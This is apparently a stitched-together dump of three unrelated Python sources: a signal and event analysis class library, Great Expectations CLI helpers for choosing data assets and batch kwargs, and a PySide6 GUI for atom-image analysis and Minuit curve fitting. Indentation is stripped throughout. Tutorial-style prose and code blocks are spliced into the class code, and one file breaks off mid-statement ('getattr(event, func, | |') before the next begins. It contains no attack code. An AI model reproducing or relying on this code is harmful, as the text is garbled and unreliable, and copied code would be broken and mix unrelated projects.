Calculate d^2y/dt^2. The values will be cached.
Returns
-------
d^2y/dt^2: ndarray
"""
return self._time_derivate(self.dydt)
@cached_property
def integral(self):
"""
Calculate the integral of the signal. The values will be cached.
Returns
-------
integral: float
"""
return integral_trapz(self.t, self.y)
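`integral_trapz` is imported from the project's own utils module; a plausible stand-in (an assumption about its behavior, not the project code) is the plain trapezoidal rule:

```python
import numpy as np

def integral_trapz(t, y):
    # trapezoidal rule: interval widths times the mean of the endpoint values
    dt = np.diff(t)
    return float(np.sum(dt * (y[:-1] + y[1:]) / 2.0))

t = np.linspace(0.0, 1.0, 101)
y = 2.0 * t      # the integral of 2t over [0, 1] is exactly 1
```

The trapezoidal rule is exact for piecewise-linear integrands, so this recovers 1 up to floating-point error.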
@cached_property
def sign_change_y(self):
"""
Trigger sign change of y. The values will be cached.
Returns
-------
sign change trigger: ndarray
"""
return np.array([0] + list(np.diff(np.sign(self.y))))
@cached_property
def sign_change_dydt(self):
"""
Trigger sign change of dy/dt. The values will be cached.
Returns
-------
sign change trigger: ndarray
"""
return np.array([0] + list(np.diff(np.sign(self.dydt))))
@cached_property
def sign_change_d2ydt2(self):
"""
Trigger sign change of d^2y/dt^2. The values will be cached.
Returns
-------
sign change trigger: ndarray
"""
return np.array([0] + list(np.diff(np.sign(self.d2ydt2))))
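The trigger arrays above are nonzero exactly at samples where the sign flipped relative to the previous sample, which makes zero-crossing detection a one-liner:

```python
import numpy as np

y = np.array([-2.0, -1.0, 0.5, 1.0, -0.5])
# same recipe as sign_change_y above
trigger = np.array([0] + list(np.diff(np.sign(y))))
crossings = np.nonzero(trigger)[0]   # indices right after each sign flip
```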
def __getitem__(self, item):
config = self.get_config()
config['name'] = None
config['identifier'] = None
config['listed'] = False
return self.__class__(y=self.y[item], t=self.t[item], **config)
def export2csv(self, fname, delimiter='\t', header=['time', 'signal'], **kwargs):
"""
Export data to csv.
Parameters
----------
fname: str
File name of the created file.
delimiter: str, optional
Used delimiter. Default '\t'.
header: list, optional
List of column names.
"""
np.savetxt(fname, np.array([self.t, self.y]).T, delimiter=delimiter, header=delimiter.join(header), **kwargs)
def get_config(self):
"""
Get config of the object for serialization.
Returns
-------
object config: dict
"""
base_config = super(CoreSingleSignal, self).get_config()
config = {}
return dict(
list(base_config.items())
+ list(config.items()))
def __del__(self):
if self.name in __signal_names__:
del get_signal_names()[self.name]
class CoreEvent(CoreSingleSignal):
def __init__(self, data: CoreSingleSignal = None, t_start: float = None, t_end: float = None,
t_reference: float = None, y_reference: float = None, **kwargs):
super(CoreEvent, self).__init__(**kwargs)
self._t_reference = None
self._y_reference = None
self.register_cached_property('t_local')
self.register_cached_property('y_local')
self.register_cached_property('sign_change_y_local')
self._t_start = copy(t_start)
self._t_end = copy(t_end)
self._t_reference = copy(t_reference)
self._event_descriptors = ['integral', 'rising_time', 'recovery_time']
if data is None:
self._event_data = []
self.reference_time = t_reference
self.reference_value = y_reference if y_reference is not None else None
self.start_time = t_start
self.end_time = t_end
self.start_value = None
self.end_value = None
else:
if t_start is None:
id_start = 0
elif t_start < data.t[0]:
id_start = 0
else:
id_start = np.where(data.t <= t_start)[0][-1]
if t_end is None:
id_end = len(data.t) - 1
elif t_end > data.t[-1]:
id_end = len(data.t) - 1
else:
id_end = np.where(data.t >= t_end)[0][0]
cut_signal = copy(data[id_start:id_end + 1])
if t_reference is None:
t_reference = cut_signal.t[0]
for key in cut_signal._cached_properties:
if key in self._cached_properties:
for entry in cut_signal._cached_properties[key]:
if entry not in self._cached_properties[key]:
self._cached_properties[key].append(entry)
self.set_t(copy(cut_signal.t))
self.set_y(copy(cut_signal.y))
self._event_data = [] # have to be after data setting, because __setattr__
self.reference_time = t_reference
self.reference_value = y_reference if y_reference is not None else self.y[0]
self.start_time = self.t_local[0]
self.end_time = self.t_local[-1]
self.start_value = self.y_local[0]
self.end_value = self.y_local[-1]
@property
def reference_time(self):
return self._t_reference
@reference_time.setter
def reference_time(self, value):
self.del_cache()
self._t_reference = value
@property
def reference_value(self):
return self._y_reference
@reference_value.setter
def reference_value(self, value):
self.del_cache()
self._y_reference = value
@cached_property
def t_local(self):
return self.t - self.reference_time
@cached_property
def y_local(self):
return self.y - self.reference_value
@cached_property
def sign_change_y_local(self):
return np.array([0] + list(np.diff(np.sign(self.y_local))))
@property
def event_data(self):
return dict((key, self[key]) for key in self._event_data + self._event_descriptors)
def __getitem__(self, key):
if getattr(self, key, None) is not None:
return getattr(self, key)
else:
return np.NaN
def __setitem__(self, key, value):
if key in ['y', 't', 'dydt', 'd2ydt2', 'data', 'integral']:
raise KeyError('{} is a predefined class element!'.format(key))
if key not in self._event_data:
self._event_data.append(key)
setattr(self, key, value)
def _set_item(self, key, value, add_to_event_data=False):
if add_to_event_data and key not in self._event_data:
self._event_data.append(key)
setattr(self, key, value)
def __setattr__(self, name, value):
def check_descriptors(name):
for cls in type(self).__mro__: # handle properties via descriptor check
if name in cls.__dict__:
yield cls.__dict__[name]
if '_event_data' in self.__dict__:
if name not in self._event_data and name[0] != '_': # hide keys starting with '_'
self._event_data.append(name)
possible_descriptors = list(check_descriptors(name))
if len(possible_descriptors) > 0:
possible_descriptors[-1].__set__(self, value)
else:
self.__dict__[name] = value
def __delitem__(self, key):
if '_event_data' in self.__dict__:
if key in self._event_data:
self._event_data.remove(key)
delattr(self, key)
def __delattr__(self, name):
if name in self._event_data:
self._event_data.remove(name)
if name in self.__dict__:
del self.__dict__[name]
else:
delattr(self, name)
def __contains__(self, key):
return key in self._event_data + self._event_descriptors
def __len__(self):
return len(self._t)
@property
def data(self):
return dict((key, getattr(self, key, np.NaN)) for key in self._event_data + self._event_descriptors)
def to_Series(self):
return pd.Series(self.data)
def __str__(self):
return str(self.data)
def get_config(self):
base_config = super(CoreEvent, self).get_config()
config = {
't_start': self._t_start,
't_end': self._t_end,
't_reference': self._t_reference
}
return dict(list(base_config.items()) + list(config.items()))
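The index arithmetic `CoreEvent.__init__` uses to cut a window out of the parent signal (clamping out-of-range bounds to the sampled interval) can be isolated like this; `window_indices` is an illustrative helper:

```python
import numpy as np

def window_indices(t, t_start, t_end):
    # clamp the requested window to the sampled range, as CoreEvent does
    if t_start is None or t_start < t[0]:
        id_start = 0
    else:
        id_start = int(np.where(t <= t_start)[0][-1])
    if t_end is None or t_end > t[-1]:
        id_end = len(t) - 1
    else:
        id_end = int(np.where(t >= t_end)[0][0])
    return id_start, id_end

t = np.array([0.0, 1.0, 2.0, 3.0, 4.0])
```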
class CoreEventList(IdentifedCachedObject):
def __init__(self, *args, **kwargs):
super(CoreEventList, self).__init__(*args, **kwargs)
self.register_cached_property('_event_data')
self._event_list = []
# self._event_data = []
@cached_property
def _event_data(self):
event_data = set()
for event in self:
event_data.update(event._event_data)
event_data.update(event._event_descriptors)
return list(event_data)
def __len__(self):
return len(self._event_list)
def __iter__(self):
self._iter_n = 0
return self
def __next__(self):
if self._iter_n < len(self._event_list):
result = self._event_list[self._iter_n]
self._iter_n += 1
return result
else:
raise StopIteration
def __getitem__(self, item):
return list(map(lambda event: event[item], self._event_list))
def __getattr__(self, item):
if item in self._event_data:
return list(map(lambda event: event[item], self._event_list))
def __setitem__(self, key, value):
for event in self:
event[key] = value
def add_event(self, event: CoreEvent):
self.del_cache()
for key in event._event_data:
if key not in self._event_data:
self._event_data.append(key)
self._event_list.append(event)
def append(self, event: CoreEvent):
self.add_event(event)
def remove_event(self, event):
if isinstance(event, int):
del self._event_list[event]
elif isinstance(event, CoreEvent):
self._event_list.remove(event)
else:
raise TypeError('Value has to be int or CoreEvent, not {}'.format(event.__class__.__name__))
def remove(self, event: CoreEvent):
self.remove_event(event)
@property
def data(self):
data = {}
for key in self._event_data:
data.update({key: list(map(lambda event: event[key], self._event_list))})
return data
def __str__(self):
return str(self.data)
def apply(self, func, key=None, **kwargs):
self.del_cache()
if key is not None:
for event, value in zip(self, list(func)):
event[key] = value
elif isinstance(func, str):
for event in self:
foo = getattr(event, func, | |
import logging
import os
import sys
import uuid
import click
from great_expectations import exceptions as ge_exceptions
from great_expectations.cli import toolkit
from great_expectations.cli.pretty_printing import cli_message
from great_expectations.core import ExpectationSuite
from great_expectations.datasource import (
PandasDatasource,
SparkDFDatasource,
SqlAlchemyDatasource,
)
from great_expectations.datasource.batch_kwargs_generator import (
TableBatchKwargsGenerator,
)
from great_expectations.exceptions import BatchKwargsError
from great_expectations.validator.validator import BridgeValidator
logger = logging.getLogger(__name__)
try:
import sqlalchemy
except ImportError:
logger.debug(
"Unable to load SqlAlchemy context; install optional sqlalchemy dependency for support"
)
sqlalchemy = None
# TODO consolidate all the myriad CLI tests into this
def select_batch_kwargs_generator(
context, datasource_name, available_data_assets_dict=None
):
msg_prompt_select_generator = "Select batch kwarg generator"
if available_data_assets_dict is None:
available_data_assets_dict = context.get_available_data_asset_names(
datasource_names=datasource_name
)
available_data_asset_names_by_generator = {}
for key, value in available_data_assets_dict[datasource_name].items():
if len(value["names"]) > 0:
available_data_asset_names_by_generator[key] = value["names"]
if len(available_data_asset_names_by_generator.keys()) == 0:
return None
elif len(available_data_asset_names_by_generator.keys()) == 1:
return list(available_data_asset_names_by_generator.keys())[0]
else: # multiple batch_kwargs_generators
generator_names = list(available_data_asset_names_by_generator.keys())
choices = "\n".join(
[
" {}. {}".format(i, generator_name)
for i, generator_name in enumerate(generator_names, 1)
]
)
option_selection = click.prompt(
msg_prompt_select_generator + "\n" + choices,
type=click.Choice(
[str(i) for i, generator_name in enumerate(generator_names, 1)]
),
show_choices=False,
)
batch_kwargs_generator_name = generator_names[int(option_selection) - 1]
return batch_kwargs_generator_name
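The numbered-menu pattern used with `click.prompt` above (render " 1. name" lines, accept only the matching digits, map the answer back to a name) is easy to factor out; `numbered_choices` is an illustrative helper, not part of great_expectations:

```python
def numbered_choices(names):
    # build the menu text and the list of valid answers ("1", "2", ...)
    menu = "\n".join(
        "    {}. {}".format(i, name) for i, name in enumerate(names, 1)
    )
    valid = [str(i) for i in range(1, len(names) + 1)]
    return menu, valid

names = ["tables", "subdir_reader"]
menu, valid = numbered_choices(names)
chosen = names[int("2") - 1]   # a user answering "2" picks the second entry
```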
# TODO this method needs testing
# TODO this method has different numbers of returned objects
def get_batch_kwargs(
context,
datasource_name=None,
batch_kwargs_generator_name=None,
data_asset_name=None,
additional_batch_kwargs=None,
):
"""
This method manages the interaction with the user necessary to obtain batch_kwargs for a batch of a data asset.
In order to get batch_kwargs this method needs datasource_name, batch_kwargs_generator_name and data_asset_name
to combine them into a fully qualified data asset identifier (datasource_name/batch_kwargs_generator_name/data_asset_name).
All three arguments are optional. If they are present, the method uses their values. Otherwise, the method
prompts the user to enter them interactively. Since it is possible for any of these three components to be
passed to this method as empty values and to get their values after interacting with the user, this method
returns these components' values in case they changed.
If the datasource has batch_kwargs_generators that can list available data asset names, the method lets the user choose a name
from that list (note: if there are multiple batch_kwargs_generators, the user has to choose one first). If a name known to
the chosen batch_kwargs_generator is selected, that generator will be able to yield batch_kwargs. The method also gives the user
an alternative to selecting a data asset name from the generator's list - the user can type in a name for their
data asset. In this case a passthrough batch kwargs generator will be used to construct a fully qualified data asset
identifier (note: if the datasource has no passthrough batch_kwargs_generator configured, the method will exit with a failure).
Since no batch_kwargs_generator can yield batch_kwargs for such a data asset name, the method prompts the user to specify batch_kwargs
by choosing a file (if the datasource is pandas or spark) or by writing a SQL query (if the datasource points
to a database).
:param context:
:param datasource_name:
:param batch_kwargs_generator_name:
:param data_asset_name:
:param additional_batch_kwargs:
:return: a tuple: (datasource_name, batch_kwargs_generator_name, data_asset_name, batch_kwargs). The components
of the tuple were passed into the methods as optional arguments, but their values might
have changed after this method's execution. If the returned batch_kwargs is None, it means
that the batch_kwargs_generator will know to yield batch_kwargs when called.
"""
try:
available_data_assets_dict = context.get_available_data_asset_names(
datasource_names=datasource_name
)
except ValueError:
# the datasource has no batch_kwargs_generators
available_data_assets_dict = {datasource_name: {}}
data_source = toolkit.select_datasource(context, datasource_name=datasource_name)
datasource_name = data_source.name
if batch_kwargs_generator_name is None:
batch_kwargs_generator_name = select_batch_kwargs_generator(
context,
datasource_name,
available_data_assets_dict=available_data_assets_dict,
)
# if the user provided us with the batch kwargs generator name and the data asset, we have everything we need -
# let's ask the generator to build batch kwargs for this asset - we are done.
if batch_kwargs_generator_name is not None and data_asset_name is not None:
generator = data_source.get_batch_kwargs_generator(batch_kwargs_generator_name)
batch_kwargs = generator.build_batch_kwargs(
data_asset_name, **additional_batch_kwargs
)
return batch_kwargs
if isinstance(
context.get_datasource(datasource_name), (PandasDatasource, SparkDFDatasource)
):
(
data_asset_name,
batch_kwargs,
) = _get_batch_kwargs_from_generator_or_from_file_path(
context,
datasource_name,
batch_kwargs_generator_name=batch_kwargs_generator_name,
)
elif isinstance(context.get_datasource(datasource_name), SqlAlchemyDatasource):
data_asset_name, batch_kwargs = _get_batch_kwargs_for_sqlalchemy_datasource(
context, datasource_name, additional_batch_kwargs=additional_batch_kwargs
)
else:
raise ge_exceptions.DataContextError(
"Datasource {:s} is expected to be a PandasDatasource, SparkDFDatasource or SqlAlchemyDatasource, but is {:s}".format(
datasource_name, str(type(context.get_datasource(datasource_name)))
)
)
return (datasource_name, batch_kwargs_generator_name, data_asset_name, batch_kwargs)
def _get_batch_kwargs_from_generator_or_from_file_path(
context,
datasource_name,
batch_kwargs_generator_name=None,
additional_batch_kwargs=None,
):
if additional_batch_kwargs is None:
additional_batch_kwargs = {}
msg_prompt_generator_or_file_path = """
Would you like to:
1. choose from a list of data assets in this datasource
2. enter the path of a data file
"""
msg_prompt_file_path = """
Enter the path of a data file (relative or absolute, s3a:// and gs:// paths are ok too)
"""
msg_prompt_enter_data_asset_name = "\nWhich data would you like to use?\n"
msg_prompt_enter_data_asset_name_suffix = (
" Don't see the name of the data asset in the list above? Just type it\n"
)
msg_prompt_file_type = """
We could not determine the format of the file. What is it?
1. CSV
2. Parquet
3. Excel
4. JSON
"""
reader_method_file_extensions = {
"1": "csv",
"2": "parquet",
"3": "xlsx",
"4": "json",
}
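The menu above maps a numeric choice onto a file extension so the datasource's reader-method guesser can be retried with an explicit hint. The idea can be sketched standalone; the mapping and helper name below are illustrative assumptions, not the Great Expectations API (which uses `guess_reader_method_from_path`):

```python
import os

# Hypothetical sketch of the extension -> reader-method idea behind the
# menu above; the real guesser in Great Expectations is richer.
EXTENSION_TO_READER = {".csv": "csv", ".parquet": "parquet", ".xlsx": "excel", ".json": "json"}

def guess_reader_from_extension(path):
    # Normalize case so "events.CSV" and "events.csv" behave the same.
    _, ext = os.path.splitext(path.lower())
    return EXTENSION_TO_READER.get(ext)  # None when the extension is unknown

print(guess_reader_from_extension("data/events.CSV"))  # -> csv
```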
data_asset_name = None
datasource = context.get_datasource(datasource_name)
if batch_kwargs_generator_name is not None:
generator = datasource.get_batch_kwargs_generator(batch_kwargs_generator_name)
option_selection = click.prompt(
msg_prompt_generator_or_file_path,
type=click.Choice(["1", "2"]),
show_choices=False,
)
if option_selection == "1":
available_data_asset_names = sorted(
generator.get_available_data_asset_names()["names"], key=lambda x: x[0]
)
available_data_asset_names_str = [
"{} ({})".format(name[0], name[1])
for name in available_data_asset_names
]
data_asset_names_to_display = available_data_asset_names_str[:50]
choices = "\n".join(
[
" {}. {}".format(i, name)
for i, name in enumerate(data_asset_names_to_display, 1)
]
)
        prompt = (
            msg_prompt_enter_data_asset_name
            + choices
            + "\n"
            + msg_prompt_enter_data_asset_name_suffix
        )
data_asset_name_selection = click.prompt(prompt, show_default=False)
data_asset_name_selection = data_asset_name_selection.strip()
try:
data_asset_index = int(data_asset_name_selection) - 1
try:
data_asset_name = [name[0] for name in available_data_asset_names][
data_asset_index
]
except IndexError:
pass
except ValueError:
data_asset_name = data_asset_name_selection
batch_kwargs = generator.build_batch_kwargs(
data_asset_name, **additional_batch_kwargs
)
return (data_asset_name, batch_kwargs)
# No generator name was passed or the user chose to enter a file path
# We should allow a directory for Spark, but not for Pandas
dir_okay = isinstance(datasource, SparkDFDatasource)
path = None
while True:
# do not use Click to check if the file exists - the get_batch
# logic will check this
path = click.prompt(
msg_prompt_file_path,
type=click.Path(dir_okay=dir_okay),
default=path,
)
if not path.startswith("gs:") and not path.startswith("s3"):
path = os.path.abspath(path)
batch_kwargs = {"path": path, "datasource": datasource_name}
reader_method = None
try:
reader_method = datasource.guess_reader_method_from_path(path)[
"reader_method"
]
except BatchKwargsError:
pass
if reader_method is None:
while True:
option_selection = click.prompt(
msg_prompt_file_type,
type=click.Choice(["1", "2", "3", "4"]),
show_choices=False,
)
try:
reader_method = datasource.guess_reader_method_from_path(
path + "." + reader_method_file_extensions[option_selection]
)["reader_method"]
except BatchKwargsError:
pass
if reader_method is not None:
batch_kwargs["reader_method"] = reader_method
if (
isinstance(datasource, SparkDFDatasource)
and reader_method == "csv"
):
header_row = click.confirm(
"\nDoes this file contain a header row?", default=True
)
batch_kwargs["reader_options"] = {"header": header_row}
batch = datasource.get_batch(batch_kwargs=batch_kwargs)
break
else:
try:
batch_kwargs["reader_method"] = reader_method
if isinstance(datasource, SparkDFDatasource) and reader_method == "csv":
header_row = click.confirm(
"\nDoes this file contain a header row?", default=True
)
batch_kwargs["reader_options"] = {"header": header_row}
batch = datasource.get_batch(batch_kwargs=batch_kwargs)
break
except Exception as e:
file_load_error_message = """
<red>Cannot load file.</red>
- Please check the file and try again or select a different data file.
- Error: {0:s}"""
cli_message(file_load_error_message.format(str(e)))
if not click.confirm("\nTry again?", default=True):
cli_message(
"""
We have saved your setup progress. When you are ready, run great_expectations init to continue.
"""
)
sys.exit(1)
if data_asset_name is None and batch_kwargs.get("path"):
try:
# Try guessing a filename
filename = os.path.split(batch_kwargs.get("path"))[1]
# Take all but the last part after the period
filename = ".".join(filename.split(".")[:-1])
data_asset_name = filename
except (OSError, IndexError):
pass
batch_kwargs["data_asset_name"] = data_asset_name
return (data_asset_name, batch_kwargs)
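The filename-stem fallback at the end of the function (take the basename, drop the final extension) can be isolated as a small helper; the function name here is hypothetical:

```python
import os

def data_asset_name_from_path(path):
    # Same stem logic as above: basename of the path with only the final
    # extension dropped, so "data/2020.01.csv" becomes "2020.01".
    filename = os.path.split(path)[1]
    return ".".join(filename.split(".")[:-1])

print(data_asset_name_from_path("data/2020.01.csv"))  # -> 2020.01
```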
def _get_default_schema(datasource):
inspector = sqlalchemy.inspect(datasource.engine)
return inspector.default_schema_name
def _get_batch_kwargs_for_sqlalchemy_datasource(
context, datasource_name, additional_batch_kwargs=None
):
data_asset_name = None
sql_query = None
datasource = context.get_datasource(datasource_name)
msg_prompt_how_to_connect_to_data = """
You have selected a datasource that is a SQL database. How would you like to specify the data?
1. Enter a table name and schema
2. Enter a custom SQL query
3. List all tables in the database (this may take a very long time)
"""
default_schema = _get_default_schema(datasource)
temp_generator = TableBatchKwargsGenerator(name="temp", datasource=datasource)
while data_asset_name is None:
single_or_multiple_data_asset_selection = click.prompt(
msg_prompt_how_to_connect_to_data,
type=click.Choice(["1", "2", "3"]),
show_choices=False,
)
if single_or_multiple_data_asset_selection == "1": # name the table and schema
schema_name = click.prompt(
"Please provide the schema name of the table (this is optional)",
default=default_schema,
)
            table_name = click.prompt(
                "Please provide the table name (this is required)"
            )
# IMPORT PACKAGES FOR ANALYSING
# ///////////////////////////////////////////////////////////////
import string
import pandas as pd
from PIL import Image
import numpy as np
import os
from PySide6.QtWidgets import QFileDialog
from iminuit import Minuit
import matplotlib.pyplot as plt
from matplotlib.offsetbox import AnchoredText
from gui.uis.api.atom import Atom
from gui.uis.api.analysis import Analysis
from gui.uis.windows.atom_window import UI_AtomWindow
from gui.uis.windows.analysis_window import UI_AnalysisWindow
from gui.uis.api.fitting import Fit
from gui.widgets import *
from qt_core import *
# ATOM PAGE FUNCTIONALITY
def open_dialog_box_atom(atom: Atom, ui_atom: UI_AtomWindow, switch: str) -> None:
filename = QFileDialog.getOpenFileName()
if switch == "no_cloud":
atom.setNoCloudPath(filename[0])
ui_atom.load_pages.lineEdit_without_cloud_path.setText(filename[0])
print(atom.getNoCloudPath())
elif switch == "with_cloud":
atom.setCloudPath(filename[0])
ui_atom.load_pages.lineEdit_with_cloud_path.setText(filename[0])
print(atom.getCloudPath())
def calculate_atom_number(atom: Atom, ui_atom: UI_AtomWindow) -> None:
if atom.clearToLoad():
atom_number = atom.calculateAtomNumber()
print(atom_number)
ui_atom.load_pages.label_atom_number.setText(str(atom_number))
else:
error = QMessageBox()
error.setWindowTitle("Error")
print("Can not Calculate! Please load images first")
error.setText("Please load images first")
error.exec()
def load_image(atom: Atom, ui_atom: UI_AtomWindow) -> None:
error = QMessageBox()
error.setWindowTitle("Error")
error.setIcon(QMessageBox.Critical)
if checkAndSet(atom, error):
checkAndLoad(atom, error, ui_atom)
def checkAndSet(atom: Atom, error: QMessageBox) -> bool:
    condition = True
    if not atom.clearToSet():
        print("Cannot set images! Please check the image paths")
        error.setText("Please check the image paths")
        error.exec()
        condition = False
    elif atom.checkImageFormatJPG():
        atom.setImageJPG()
    elif atom.checkImageFormatBIN():
        atom.setImageBIN()
    else:
        error.setText("Images are not in a supported format")
        error.exec()
        print("At least one of the images is not in JPG or BIN format")
        condition = False
    return condition
def checkAndLoad(atom: Atom, error: QMessageBox, ui_atom: UI_AtomWindow) -> None:
if not atom.clearToLoad():
print("Can not load images! Please check images numpy arrays")
error.setText("Please check images numpy arrays")
error.exec()
else:
loaded_image = atom.loadImage(ui_atom.cloud_combo.currentIndex())
if loaded_image is None:
print("ComboBox index is not Valid")
else:
ui_atom.load_pages.ImageView_Atom.setImage(loaded_image)
def clear_image(atom: Atom, ui_atom: UI_AtomWindow) -> None:
atom.clearImage()
ui_atom.load_pages.ImageView_Atom.clear()
ui_atom.load_pages.label_atom_number.setText(str(0))
ui_atom.load_pages.label_cloud_temperature.setText(str(0))
ui_atom.load_pages.lineEdit_with_cloud_path.clear()
ui_atom.load_pages.lineEdit_without_cloud_path.clear()
def combo_current_change(atom: Atom, ui_atom: UI_AtomWindow, ind: int) -> None:
loaded_image = atom.loadImage(ind)
if loaded_image is not None:
ui_atom.load_pages.ImageView_Atom.setImage(loaded_image)
else:
print("ComboBox index is not Valid")
# ANALYSIS PAGE FUNCTIONALITY
def open_dialog_box_analysis(analysis: Analysis, switch: str, ui_analysis: UI_AnalysisWindow) -> None:
error = QMessageBox()
error.setWindowTitle("Error")
error.setIcon(QMessageBox.Critical)
filename = QFileDialog.getOpenFileName()
if switch == "excel_file":
analysis.setExcelPath(filename[0])
print(analysis.getExcelPath())
if not analysis.checkExcelFormat():
print("file is not in excel format!")
error.setText("File must be in xlsx format")
error.exec()
else:
ui_analysis.load_pages.lineEdit_analysis_excel_name.setText(analysis.getExcelPath())
excel_file = pd.ExcelFile(analysis.getExcelPath())
ui_analysis.load_pages.comboBox_analysis_excel_sheet_names.addItems(excel_file.sheet_names)
print("Sheet names: ", excel_file.sheet_names)
def send_excel_parameters(analysis: Analysis, ui_analysis: UI_AnalysisWindow) -> None:
error = QMessageBox()
error.setWindowTitle("Error")
error.setIcon(QMessageBox.Critical)
# Collecting Excel's groupbox parameters into a boolean list
# List represent the result of each method
bool_list = [analysis.setSheetName(ui_analysis.load_pages.comboBox_analysis_excel_sheet_names.currentText()),
analysis.setExcelPath(ui_analysis.load_pages.lineEdit_analysis_excel_name.text())]
# All methods succeed
if all(bool_list):
if not analysis.checkExcelFormat():
print("file is not in excel format!")
error.setText("File must be in xlsx format")
error.exec()
else:
if analysis.readExcel(): # Create data frame related excel path
print("Created Data Frame from excel path")
if analysis.initializeAxis():
initialize_excel_axis(ui_analysis.analysis.getExcelAxis(), ui_analysis)
print("Axis initialization succeed")
else:
print("Missing excel parameters information!")
error.setText("Missing data, please check that all parameters are loaded")
error.exec()
def fun_fit_changed(analysis: Analysis, ui_analysis: UI_AnalysisWindow, ind: int):
    # Set the fit function label to match the newly chosen function
ui_analysis.load_pages.label_analysis_fit_function.setText(analysis.fun_texts.fun_non_latex_texts_array[ind])
# number of parameters of new fit function
new_num_of_params = analysis.fun_fits.number_of_params[ind]
# Check if the new fit function has the same amount of parameters
if new_num_of_params == analysis.fit.get_func_par_num():
return
else:
analysis.fit.set_func_par_num(new_num_of_params)
refresh_params_data_enable(ui_analysis, new_num_of_params)
def initialize_excel_axis(axis: np.ndarray, ui_analysis: UI_AnalysisWindow) -> None:
ui_analysis.load_pages.comboBox_analysis_x_axis.clear()
ui_analysis.load_pages.comboBox_analysis_y_axis.clear()
ui_analysis.load_pages.comboBox_analysis_x_error.clear()
ui_analysis.load_pages.comboBox_analysis_y_error.clear()
print("clean old axis")
ui_analysis.load_pages.comboBox_analysis_x_axis.addItems(axis)
ui_analysis.load_pages.comboBox_analysis_y_axis.addItems(axis)
ui_analysis.load_pages.comboBox_analysis_x_error.addItems(np.append(axis, "None"))
ui_analysis.load_pages.comboBox_analysis_y_error.addItems(np.append(axis, "None"))
def plot_analysis_data(analysis: Analysis, ui_analysis: UI_AnalysisWindow) -> None:
set_data(analysis, ui_analysis)
set_data_2_graph(analysis, ui_analysis)
def optimize_analysis_data(analysis: Analysis, ui_analysis: UI_AnalysisWindow) -> None:
ui_analysis.analysis.fit = Fit()
set_data(analysis, ui_analysis)
# Initialize parameters with user's data
set_parameters(analysis, ui_analysis)
# Activate optimization
set_opt_and_plot(analysis, ui_analysis)
# Update optimized parameters
update_parameters(analysis, ui_analysis)
def get_axis_labels(ui_analysis: UI_AnalysisWindow) -> list:
x_name = ui_analysis.load_pages.comboBox_analysis_x_axis.currentText()
y_name = ui_analysis.load_pages.comboBox_analysis_y_axis.currentText()
dx_name = ui_analysis.load_pages.comboBox_analysis_x_error.currentText()
dy_name = ui_analysis.load_pages.comboBox_analysis_y_error.currentText()
return [x_name, y_name, dx_name, dy_name]
def set_data(analysis: Analysis, ui_analysis: UI_AnalysisWindow):
df: pd.DataFrame = analysis.getDataFrame()
labels = get_axis_labels(ui_analysis)
x = df[labels[0]].values
y = df[labels[1]].values
if labels[2] == "None":
dx = None
else:
dx = df[labels[2]].values
if labels[3] == "None":
dy = None
else:
dy = df[labels[3]].values
ui_analysis.analysis.setFitData(x, y, dx, dy)
def set_opt_and_plot(analysis: Analysis, ui_analysis: UI_AnalysisWindow):
# Set fit function index as user marked
fun_ind = ui_analysis.load_pages.comboBox_analysis_fit_function.currentIndex()
# Set the wanted fit function
print(analysis.fun_texts.fun_texts_array[fun_ind])
analysis.fit.set_function(analysis.fun_fits.fun_fit_array[fun_ind])
# Keep the number of parameters in the fit function
analysis.fit.set_func_par_num(analysis.fun_fits.number_of_params[fun_ind])
# Activate optimization with the current cost function
if analysis.fit.has_uncertainty():
opt: Minuit = analysis.fit.optimize()
ui_analysis.load_pages.lineEdit_analysis_chi2Ndof.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_chi2Ndof.setText(str(analysis.fit.get_chi_ndof()))
update_parameters_error(analysis, ui_analysis)
# Plot data on a graph
else:
analysis.fit.opt_by_scipy()
ui_analysis.load_pages.lineEdit_analysis_chi2Ndof.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_chi2Ndof.setText("None")
# Plot data on a graph
plot_opt_func(analysis, ui_analysis)
def set_parameters(analysis: Analysis, ui_analysis: UI_AnalysisWindow):
param_num = analysis.fit.get_func_par_num()
analysis.fit.set_a_initial(float(ui_analysis.load_pages.lineEdit_analysis_initial_a.text()))
analysis.fit.set_a_limits(float(ui_analysis.load_pages.lineEdit_analysis_s_limit_a.text()),
float(ui_analysis.load_pages.lineEdit_analysis_f_limit_a.text()))
if param_num > 1:
analysis.fit.set_b_initial(float(ui_analysis.load_pages.lineEdit_analysis_initial_b.text()))
analysis.fit.set_b_limits(float(ui_analysis.load_pages.lineEdit_analysis_s_limit_b.text()),
float(ui_analysis.load_pages.lineEdit_analysis_f_limit_b.text()))
if param_num > 2:
analysis.fit.set_c_initial(float(ui_analysis.load_pages.lineEdit_analysis_initial_c.text()))
analysis.fit.set_c_limits(float(ui_analysis.load_pages.lineEdit_analysis_s_limit_c.text()),
float(ui_analysis.load_pages.lineEdit_analysis_f_limit_c.text()))
if param_num > 3:
analysis.fit.set_d_initial(float(ui_analysis.load_pages.lineEdit_analysis_initial_d.text()))
analysis.fit.set_d_limits(float(ui_analysis.load_pages.lineEdit_analysis_s_limit_d.text()),
float(ui_analysis.load_pages.lineEdit_analysis_f_limit_d.text()))
def refresh_params_data_enable(ui_analysis: UI_AnalysisWindow, params_num: int):
if params_num == 1:
ui_analysis.load_pages.lineEdit_analysis_initial_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_initial_b.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_s_limit_b.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_f_limit_b.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_param_b.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_err_b.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_initial_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_s_limit_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_f_limit_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_param_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_err_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_initial_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_s_limit_d.setEnabled(False)
